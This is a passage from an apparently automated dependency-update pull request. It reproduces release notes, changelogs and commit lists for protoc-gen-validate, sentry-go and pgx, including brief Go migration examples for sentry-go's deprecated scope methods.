href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1341\"\u003ebufbuild/protoc-gen-validate#1341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1340\"\u003ebufbuild/protoc-gen-validate#1340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the go-tests group in /tests with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1339\"\u003ebufbuild/protoc-gen-validate#1339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1343\"\u003ebufbuild/protoc-gen-validate#1343\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport for latest setuptools by \u003ca href=\"https://github.com/matejsp\"\u003e\u003ccode\u003e@​matejsp\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1345\"\u003ebufbuild/protoc-gen-validate#1345\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace deprecated java_proto_library from rules_java by \u003ca href=\"https://github.com/mmorel-35\"\u003e\u003ccode\u003e@​mmorel-35\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1349\"\u003ebufbuild/protoc-gen-validate#1349\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1350\"\u003ebufbuild/protoc-gen-validate#1350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1351\"\u003ebufbuild/protoc-gen-validate#1351\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump wheel from 0.45.1 to 0.46.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1352\"\u003ebufbuild/protoc-gen-validate#1352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate go and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1355\"\u003ebufbuild/protoc-gen-validate#1355\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate python and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1354\"\u003ebufbuild/protoc-gen-validate#1354\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1356\"\u003ebufbuild/protoc-gen-validate#1356\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-root group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1357\"\u003ebufbuild/protoc-gen-validate#1357\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate README.md by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1233\"\u003ebufbuild/protoc-gen-validate#1233\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix unreliable asset generation by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1235\"\u003ebufbuild/protoc-gen-validate#1235\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/92b9a7df69ca9f71bfc492f7a90adf4d36eab569\"\u003e\u003ccode\u003e92b9a7d\u003c/code\u003e\u003c/a\u003e Update Python 3.9 references to 3.10 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1370\"\u003e#1370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/e72f3dc29517fe8664e8f59680d0d48fa918df03\"\u003e\u003ccode\u003ee72f3dc\u003c/code\u003e\u003c/a\u003e Attempt to fix release (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1368\"\u003e#1368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/39d950bc7aafa91a2e592dc3a7b4768a189f0af1\"\u003e\u003ccode\u003e39d950b\u003c/code\u003e\u003c/a\u003e Bump the python-root group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1357\"\u003e#1357\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/c4c14142d65a4ba260d5f06fdd5e904f940c46a4\"\u003e\u003ccode\u003ec4c1414\u003c/code\u003e\u003c/a\u003e Bump the java group in /java with 2 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1356\"\u003e#1356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/05cc215303e1297497ab092d97647eb4fb9ceb1a\"\u003e\u003ccode\u003e05cc215\u003c/code\u003e\u003c/a\u003e Update python and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1354\"\u003e#1354\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/1a76a21e21e50cbd1d42000baf3e8a285d6810dc\"\u003e\u003ccode\u003e1a76a21\u003c/code\u003e\u003c/a\u003e Update go and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1355\"\u003e#1355\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/3212c98f3a0381ab8ca2f7c2ac733adbdae361da\"\u003e\u003ccode\u003e3212c98\u003c/code\u003e\u003c/a\u003e Bump wheel from 0.45.1 to 0.46.2 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1352\"\u003e#1352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/4231822c297f46ae238f7130e3d6f747a24b2005\"\u003e\u003ccode\u003e4231822\u003c/code\u003e\u003c/a\u003e Bump the java group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1351\"\u003e#1351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/187ff66a4da4e35729d0946ae8eb24caf5168678\"\u003e\u003ccode\u003e187ff66\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/ae40bad58381838eeb79628bfaf3d560f8a85a4a\"\u003e\u003ccode\u003eae40bad\u003c/code\u003e\u003c/a\u003e Replace deprecated java_proto_library from rules_java (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1349\"\u003e#1349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/compare/v1.2.1...v1.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/getsentry/sentry-go` from 0.34.1 to 0.44.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/releases\"\u003egithub.com/getsentry/sentry-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nv0.44.0 had to be released as v0.44.1 due to a technical issue.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\r\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\r\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\r\n)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eOther\u003c/h4\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/blob/master/CHANGELOG.md\"\u003egithub.com/getsentry/sentry-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nThe v0.44.0 is missing due to a technical issue and had to be released again as v0.44.1\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\n)\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/16414f29918c1fb660d4792046f08224dfefc632\"\u003e\u003ccode\u003e16414f2\u003c/code\u003e\u003c/a\u003e release: 0.44.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d26d3ecd4bceb8b900147c2e8faf993c1fdf8720\"\u003e\u003ccode\u003ed26d3ec\u003c/code\u003e\u003c/a\u003e ci: add preReleaseCommand for craft (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1232\"\u003e#1232\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/65538eb2c2b714f1aec781267612d97e4a4f8d94\"\u003e\u003ccode\u003e65538eb\u003c/code\u003e\u003c/a\u003e build(deps): bump github.com/buger/jsonparser in /zerolog (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1231\"\u003e#1231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/91096be62b80b40a2e1d8e62f42115dede34c054\"\u003e\u003ccode\u003e91096be\u003c/code\u003e\u003c/a\u003e chore: pin GitHub Actions to full-length commit SHAs (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1230\"\u003e#1230\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/df391b0baee60760635a948da32e82e362d7a84e\"\u003e\u003ccode\u003edf391b0\u003c/code\u003e\u003c/a\u003e feat: add RemoveAttribute api on the scope (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1224\"\u003e#1224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/340c142cf974aaba7dcb6545101fe125a7d8ad7c\"\u003e\u003ccode\u003e340c142\u003c/code\u003e\u003c/a\u003e fix: TestAsyncTransport_SendEnvelope flakiness (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1226\"\u003e#1226\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/e561a25fe7f0b594a005138bf71db4fd12faacf3\"\u003e\u003ccode\u003ee561a25\u003c/code\u003e\u003c/a\u003e build: Bump getsentry/craft to 2.24.1 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1225\"\u003e#1225\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/259b20563d61c7da69d8d83361427e1a8bbd873a\"\u003e\u003ccode\u003e259b205\u003c/code\u003e\u003c/a\u003e feat: add support for homogenous arrays (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1203\"\u003e#1203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/bf26e9a107879c566124e27d5af51bd1851428d1\"\u003e\u003ccode\u003ebf26e9a\u003c/code\u003e\u003c/a\u003e fix: fix flaky TestAsyncTransport_FlushWithContext (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1222\"\u003e#1222\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d1edaf4192ea39be6e16ec5145ded927adfed9e9\"\u003e\u003ccode\u003ed1edaf4\u003c/code\u003e\u003c/a\u003e chore(ai): Add AGENTS.md and testing guidelines (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1216\"\u003e#1216\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-go/compare/v0.34.1...v0.44.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jackc/pgx/v5` from 5.7.5 to 5.9.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jackc/pgx/blob/master/CHANGELOG.md\"\u003egithub.com/jackc/pgx/v5's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.9.1 (March 22, 2026)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix: batch result format corruption when using cached prepared statements (reported by Dirkjan Bussink)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.9.0 (March 21, 2026)\u003c/h1\u003e\n\u003cp\u003eThis release includes a number of new features such as SCRAM-SHA-256-PLUS support, OAuth authentication support, and\nPostgreSQL protocol 3.2 support.\u003c/p\u003e\n\u003cp\u003eIt significantly reduces the amount of network traffic when using prepared statements (which are used automatically by\ndefault) by avoiding unnecessary Describe Portal messages. This also reduces local memory usage.\u003c/p\u003e\n\u003cp\u003eIt also includes multiple fixes for potential DoS due to panic or OOM if connected to a malicious server that sends\ndeliberately malformed messages.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Go 